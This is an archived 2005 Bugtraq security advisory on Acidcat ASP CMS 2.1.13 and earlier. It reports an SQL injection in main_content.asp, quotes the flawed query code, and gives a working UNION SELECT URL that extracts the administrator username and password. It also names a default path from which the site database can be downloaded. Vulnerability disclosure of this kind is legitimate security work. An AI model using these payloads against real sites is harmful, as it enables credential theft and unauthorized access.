Acidcat ASP CMS Multiple Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Acidcat ASP CMS Multiple Vulnerabilities
From: h e <het_ebadi@xxxxxxxxx>
Date: Tue, 20 Dec 2005 09:03:34 -0800 (PST)
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=XqGnRZxF5DDj3g38OqUhwOk66CtglX694McxwZkUL/vExrcD62csWsSszgGYbf9wJWd84ehnkhS6skxSlNspcKHKZF/plGobkgC1nsORr4UVLjTiAA4hR8POWPQiByFL41nEcA4fWD1LTpIJj44/m5K0kx91U4sVEYHQOvX0n1o= ;
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

http://hamid.ir

Acidcat CMS is a web site and simple content
management system that can be administered via a web
browser. 
It is free for non-commercial use.Acidcat CMS is also
an open source product.
The product has been found to contain multiple
security vulnerabilities allowing a remote attacker to
find administrator username and password.
Acidcat ASP CMS :http://www.acidcat.com

Credit:
The information has been provided by Hamid Ebadi
(Hamid Network Security Team):admin@xxxxxxxxx
The original article can be found at:
http://hamid.ir/security/

Vulnerable Systems:
 * Acidcat CMS v 2.1.13 and below
Example :
The following URL can be used to trigger an SQL
injection vulnerability in the main_content.asp page:
http://localhost/acidcat/default.asp?ID=1'

Microsoft OLE DB Provider for ODBC Drivers error
'80040e14' 
[Microsoft][ODBC Microsoft Access Driver] Syntax error
(missing operator) in query expression 'ID = 1'''. 
/main_content.asp, line 16 

Vulnerable Code:
The following lines in main_content.asp
Item.Source = "SELECT * FROM Item WHERE ID = "+
Item__MMColParam.replace(/'/g, "''") + "";


Exploit:
The following URL will illustrate how you can easily
find administrator username and password  by entering
the following URL:

http://localhost/acidcat/default.asp?ID=26 union
select 1,username,3,password,5,6 from Configuration
The base path of the login is :
http://localhost/acidcat/main_login.asp


Database Download:
The database can be downloaded over the web  (default
installation).it can be found on
http://localhost/acidcat/databases/acidcat.mdb



Signature
 


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com

Prev by Date: Re: Unauthenticated EIGRP DoS
Next by Date: PHPGedView <= 3.3.7 remote code execution
Previous by thread: Re: Unauthenticated EIGRP DoS
Next by thread: PHPGedView <= 3.3.7 remote code execution
Index(es):
- Date
- Thread